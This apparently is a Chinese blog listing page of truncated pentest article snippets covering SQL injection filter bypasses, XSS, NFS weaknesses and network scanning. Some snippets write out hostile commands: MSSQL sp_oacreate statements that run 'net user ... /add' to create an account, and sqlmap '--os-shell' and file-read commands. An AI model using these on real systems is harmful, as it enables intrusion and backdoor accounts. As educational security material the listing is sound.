如果想要了解系统的安全状况,那么可以进行渗透测试,找出系统中的漏洞,验证是否存在安全隐患。渗透测试的含义不只是评估,它会用已发现的漏洞来进行测试,以验证该漏洞是真实存在还是只是虚惊一场(假阳性)。举个例子,审计或评估利用的是扫描工具,这些工具会显示多个系统上的数百个可能的漏洞。而渗透测试则会采用恶意黑客的惯用手段来尝试对这些漏洞进行攻
原创 2022-04-25 16:48:09
521阅读
扩展0day:挖掘但是未公布出来的漏洞。代理服务器vpn:在公用网络上建立专用网络,进行加密通讯。在企业网络中有广泛应用。V
原创 2天前
0阅读
网上找的,希望大家喜欢。 下载地址:网络渗透技术.rar
原创 2011-10-19 00:20:40
1237阅读
1点赞
前言 在打进内网之后,我们要判断此时的流量是否出的去、进的来。在一些真实的网络环境中,网络中的主机彼此进行通信一般是通过建立TCP连接然后进行
原创 2021-12-06 14:53:40
1515阅读
QQ 1274510382Wechat JNZ_aming商业联盟 QQ群538250800技术搞事 QQ群599020441解决方案 QQ群152889761加入我们 QQ群649347320共享学习 QQ群674240731纪年科技aming网络安全 ,深度学习,嵌入式,机器强化,生物智能,生命科学。原理ngrok 建立一个隧道
原创 2021-07-15 10:17:39
994阅读
现在的许多文章都是写的WIN2K攻防,而UNIX下 的是少之又少,而我今天写的就是UNIX下的漏洞。 众所周知,NFS是 一个非常流行的网络操作系统,现在大多数的UNIX用的是其第三版,它依赖与RPC服务。允许客户 主机远程访问其文件系统的服务器都要小心,因为NFS的配置不当也会导致被攻击。 首先很多的MOUNTD和NFS漏 洞已经被发现了,NFS提供的安全性都依赖与文件句柄,如果能探
转载 精选 2010-10-24 21:46:45
1516阅读
QQ 1285575001Wechat M010527技术交流 QQ群599020441纪年科技aming
原创 2021-07-18 20:55:23
774阅读
SQL Server 2000渗透技术研究 2008-05-28 15:48:57  标签:技术 研究 渗透    [
转载 精选 2008-08-30 05:00:29
426阅读
  Web渗透技术及实战案例解析
原创 2012-10-16 12:51:57
522阅读
虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正! 0x01 Mysql 手工注入 ...
转载 2021-10-15 15:09:00
149阅读
2评论
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/858697031.绕过空格(注释符/* */,%a0)两个空格代替一个空格,用Tab代替空格,%a0=空格:%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/最基本的绕过方法,用注释替换空格:/* 注释 */使用...
原创 2019-01-05 20:15:55
986阅读
绕过空格(注释符/* */,%a0)两个空格代替一个空格,用Tab代替空格,%a0=空格:%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/最基本的绕过方法,用注释替换空格:/* 注释 */使用...
原创 2022-04-22 21:18:40
2076阅读
1点赞
xss漏洞技术什么是xss攻击xss和javascipt是紧密相关的(离开javascipt谈xss就是耍流氓)危害: 盗取cookie 获取内网ip 获取浏览器保存的明文密码 获取网页截屏 获取网页上的键盘记录xss攻击类型持久型:被攻击之后,代码存储在服务器上面(记事本,留言板被恶意攻击之后...
原创 2021-06-21 10:51:08
285阅读
使用oacreate以及oamethod来执行命令。 declare @shell intexec sp_oacreate 'wscript.shell',@shell outexec sp_oamethod @shell ,'run',null,'net user simeon simeon /add'exec sp_oamethod @shell ,'run',null,'net local
原创 2008-05-28 15:48:57
1274阅读
域环境搭建 准备: DC: win2008 DM: win2003DM: winxp win2008(域控) 1、修改计算机名: 2、配置固定ip: 其中网关设置错误,应该为192.168.206.2,开始默认的网管 3、服务器管理器---角色: ...
转载 2022-03-07 17:09:53
1803阅读
SQLMAP的原理和进阶拿 shell sqlmap -u "http://192.168.1.9/sqli-labs/Less-1/?id=1" --os-shell(演示的时候,尽量选择linux是受害者)从数据库中读取文件借助于sqlmap这个工具,可以读取出受害者机器上的任何文件sqlmap -u "http://192.168.1.9/sqli-labs/Less-1/...
原创 2021-06-21 10:51:09
252阅读
1.网络扫描与TCP/IP技术TCP协议报文长度是不收限制的面向连接的协议保证传输的可靠性广泛运用于关键应用UDP协议报文长度是受限制的轻量级,无连接的协议不发送ACK或保证传输、常用于语音和视频的应用ICMP协议ICMP协议工作在网络层,ICMP协议没有端口号(传输层和应用层才有端口)。ping包的协议禁止ping禁止ping的iptables防火墙策...
原创 2021-06-21 10:53:09
452阅读
黑客入门,渗透技术相关资料收集
转载 2021-08-19 15:40:40
517阅读
 掌握扫描底层路由可以大大方便入侵内网,如企业,公司,学校等等。。若深入透彻技术可以截取敏感信息,简化了入侵过程,而获得路由特权的话,可以制为代理跳板,仿伪攻击等。可以说这是一种"高水平"的黑客技术手段。     首先,我们要准备的东西:"SolarWinds.Engineers.Toolset"。 &nbsp
转载 精选 2011-04-17 00:40:43
984阅读
2点赞
1评论
通过使用搜索引擎、扫描器、发送简单的HTTP请求或者专门精心制作的请求,都有可能导致应用程序泄漏诸如错误信息、版本信息以及所使用的技术等信息。 一、测试robots.txt文件 现在,我们首先介绍如何测试robots.txt文件
转载 2010-04-02 20:23:47
1334阅读
  • 1
  • 2
  • 3
  • 4
  • 5